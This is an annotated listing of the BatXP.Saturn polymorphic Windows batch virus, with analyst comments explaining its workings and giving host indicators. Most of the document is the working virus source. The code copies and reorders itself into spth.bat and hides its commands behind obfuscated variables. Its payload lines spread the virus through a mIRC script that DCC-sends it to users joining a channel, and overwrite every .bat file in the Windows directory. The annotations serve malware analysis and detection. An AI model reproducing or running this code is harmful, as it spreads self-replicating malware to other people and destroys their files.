BatXP.Saturn by Second Part To Hell
REM [analysis] Listing of a self-copying batch file, annotated for study.
REM Almost every line of the body ends in a percent-delimited tag. No tag name is
REM assigned in this listing, so each tag expands to an empty string at run time.
REM The tags let the script pick its own lines back out of its file with find.
REM Static indicator: a batch file whose lines share such a trailing tag and which
REM runs find against its own path, argument 0.
cls%SpTh%
@echo off%SpTh%
ReM ----------- BatXP.Saturn ********** by Second Part To Hell ----------- %SpTh%
ReM | %SpTh%
ReM I think, you are looking at the code and think: "What the hell is this?"| %SpTh%
ReM The answer is: A Windows XP Batch polymorph virus :D | %SpTh%
ReM WinXP is using a program named CMD.EXE instate of COMMAND.COM for DOS | %SpTh%
ReM You're able to make the really nice things with CMD which you wasn't | %SpTh%
ReM able to do it with COMMAND.COM. | %SpTh%
ReM | %SpTh%
ReM Information about the virus: | %SpTh%
ReM Virusname......................: BatXP.Saturn | %SpTh%
ReM Virusauthor....................: Second Part To Hell | %SpTh%
ReM Size...........................: The poly-engine has 1.301 Bytes | %SpTh%
ReM The whole virus has 4.158 Bytes | %SpTh%
ReM Encrypted......................: Yes, but only the virus part. | %SpTh%
ReM I'll crypt also the poly engine in | %SpTh%
ReM next versions. | %SpTh%
ReM Polymorphic....................: Yes | %SpTh%
ReM | %SpTh%
ReM written from 20.11.2002 to 22.11.2002 | %SpTh%
ReM in Austria | %SpTh%
ReM ---------------------------------------------------------------------- %SpTh%
REM Counters and flags for the reordering loop that follows are cleared here.
REM ff and gg are reset but not read again anywhere in this listing.
set a=0%SpTh%
set aa=0%SpTh%
set bb=0%SpTh%
set cc=0%SpTh%
set dd=0%SpTh%
set ee=0%SpTh%
set ff=0%SpTh%
set gg=0%SpTh%
REM Creates spth.bat in the current directory from every line of the running
REM script that carries the primary tag. An existing file of that name is replaced.
find "SpTh"<%0 >spth.bat
REM sec holds the one-letter prefix that the later find calls put in front of each
REM group tag.
set sec=A%SpTh%
REM Reordering loop. Each pass calls the RheaMoon subroutine to draw a number.
REM When the number is 45 to 49 and the matching flag is still 0, the lines of the
REM running script that carry the matching group tag are appended to spth.bat and
REM the flag is set to 1. The loop exits to the saturn label once aa to ee are all 1.
REM The five groups therefore land in the copy in a run-dependent order.
REM Defensive note: only line order changes. The tagged lines are copied as they
REM are, so matching on line content still works where a whole-file hash does not.
:TitanMoon %SpTh%
if %aa% EQU 1 (if %bb% EQU 1 (if %cc% EQU 1 (if %dd% EQU 1 (if %ee% EQU 1 (goto saturn)))))%SpTh%
call :RheaMoon%SpTh%
if %aa% EQU 0 (if %a% EQU 45 (%SpTh%
find "%Sec%aAa" <%0 >>spth.bat%SpTh%
set aa=1))%SpTh%
if %bb% EQU 0 (if %a% EQU 46 (%SpTh%
find "%sec%bBb" <%0 >>spth.bat%SpTh%
set bb=1))%SpTh%
if %cc% EQU 0 (if %a% EQU 47 (%SpTh%
find "%sec%cCc" <%0 >>spth.bat%SpTh%
set cc=1))%SpTh%
if %dd% EQU 0 (if %a% EQU 48 (%SpTh%
find "%sec%dDd" <%0 >>spth.bat%SpTh%
set dd=1))%SpTh%
if %ee% EQU 0 (if %a% EQU 49 (%SpTh%
find "%sec%eEe" <%0 >>spth.bat%SpTh%
set ee=1))%SpTh%
goto TitanMoon%SpTh%
REM Subroutine that leaves a number from 45 to 50 in the variable a.
REM It starts from the shell pseudo-random value. On each pass it halves the value
REM if it is 50 or more and adds 5 if it is 45 or less. It repeats while the value
REM is below 45 or above 50, then returns to the caller through goto :EOF.
:RheaMoon %SpTh%
set a=%random%%SpTh%
:IapetusMoon %SpTh%
if %a% GEQ 50 (set /A a=%a%/2)%SpTh%
if %a% LEQ 45 (set /A a=%a%+5)%SpTh%
if %a% LSS 45 (goto :IapetusMoon)%SpTh%
if %a% GTR 50 (goto :IapetusMoon)%SpTh%
goto :EOF %SpTh%
REM Appends the two remaining tagged sections of the running script to spth.bat.
REM The comparison on ply only decides which of the two sections is written first.
REM NOTE(review): ply is not assigned anywhere in this listing - confirm where its
REM value is expected to come from before relying on either branch order.
:saturn %SpTh%
if %ply% GTR 16383 (%SpTh%
find "%sec%sat"<%0 >>spth.bat %SpTh%
find "%sec%tas"<%0 >>spth.bat %SpTh%
) ELSE ( %SpTh%
find "%sec%tas"<%0 >>spth.bat %SpTh%
find "%sec%sat"<%0 >>spth.bat %SpTh%
) %SpTh%
REM Obfuscation table: twelve variables in five tagged groups.
REM Variable names are built only from exclamation marks and dots, and each variable
REM is assigned single lowercase letters. The pattern per variable is: assign one
REM letter, assign a second letter, goto a label of the same name, assign a third
REM letter, then the label.
REM NOTE(review): the third assignment looks like a decoy meant to be skipped by the
REM goto - inferred from the layout, not verified by execution.
REM For triage: the commands assembled from these letters never appear in clear
REM text, so keyword scanning of the raw file for command names will miss them.
REM Expand the variables statically, or match on the literal paths and file names
REM that the file leaves unobfuscated.
set !!.!!=h%AdDd%
set !!.!!=i%AdDd%
goto !!.!! %AdDd%
set !!.!!=w%AdDd%
:!!.!! %AdDd%
:!.!.. %AdDd%
set !..!!=b%AdDd%
set !..!!=y%AdDd%
goto !..!! %AdDd%
set !..!!=w%AdDd%
:!..!! %AdDd%
set !!!.!=q%AcCc%
set !!!.!=o%AcCc%
goto !!!.! %AcCc%
set !!!.!=u%AcCc%
:!!!.! %AcCc%
set !!.!.=j%AcCc%
set !!.!.=n%AcCc%
goto !!.!. %AcCc%
set !!.!.=l%AcCc%
:!!.!. %AcCc%
set !.!.!=b%AbBb%
set !.!.!=y%AbBb%
goto !.!.! %AbBb%
set !.!.!=w%AbBb%
:!.!.! %AbBb%
set !..!.=p%AbBb%
set !..!.=s%AbBb%
goto !..!. %AbBb%
set !..!.=o%AbBb%
:!..!. %AbBb%
set !!..!=f%AeEe%
set !!..!=d%AeEe%
goto !!..! %AeEe%
set !!..!=b%AeEe%
:!!..! %AeEe%
set !.!!.=w%AeEe%
set !.!!.=p%AeEe%
goto !.!!. %AeEe%
set !.!!.=d%AeEe%
:!.!!. %AeEe%
set !.!..=b%AeEe%
set !.!..=e%AeEe%
goto !.!.. %AeEe%
set !.!..=w%AeEe%
set !!!!.=t%AaAa%
set !!!!.=f%AaAa%
goto !!!!. %AaAa%
set !!!!.=k%AaAa%
:!!!!. %AaAa%
set !!!..=v%AaAa%
set !!!..=r%AaAa%
goto !!!.. %AaAa%
set !!!..=u%AaAa%
:!!!.. %AaAa%
set !.!!!=p%AaAa%
set !.!!!=c%AaAa%
goto !.!!! %AaAa%
set !.!!!=q%AaAa%
:!.!!! %AaAa%
REM Payload lines, spelled with the single-letter variables assigned earlier in
REM the file. After expansion the four lines do the following, in order:
REM   1. copy spth.bat to C:\mirc\saturn.bat
REM   2. start a new C:\mirc\script.ini with a script section header
REM   3. append an on-join event line that offers saturn.bat by DCC send to other
REM      users who join a channel
REM   4. loop over every .bat file in the Windows directory and copy spth.bat over it
REM Host indicators: a new or rewritten script.ini and a saturn.bat under C:\mirc,
REM batch files in the Windows directory that have all become identical, and a
REM spth.bat left in the working directory.
REM Step 4 overwrites the original files, so recovery means restoring them from
REM backup or installation media.
%!.!!!%%!!!.!%%!.!!.%%!.!.!% spth.bat C:\mirc\saturn.bat %Asat%
%!.!..%%!.!!!%h%!!!.!% [%!..!.%%!.!!!%%!!!..%%!!.!!%%!.!!.%t] >C:\mirc\script.ini %Asat%
%!.!..%%!.!!!%h%!!!.!% %!!.!.%0=%!!!.!%n 1:j%!!!.!%%!!.!!%%!!.!.%:*.* { %!!.!!%%!!!!.% ( $n%!!.!!%%!.!!!%k ==$m%!.!..% ) {halt} /d%!.!!!%%!.!!!% %!..!.%%!.!..%%!!.!.%d $n%!!.!!%%!.!!!%k C:\mirc\saturn.bat } >>C:\mirc\script.ini %Asat%
%!!!!.%%!!!.!%%!!!..% %%q %!!.!!%%!!.!.% (%windir%\*.bat) %!!..!%%!!!.!% %!.!!!%%!!!.!%%!.!!.%%!.!.!% spth.bat %%q %Atas%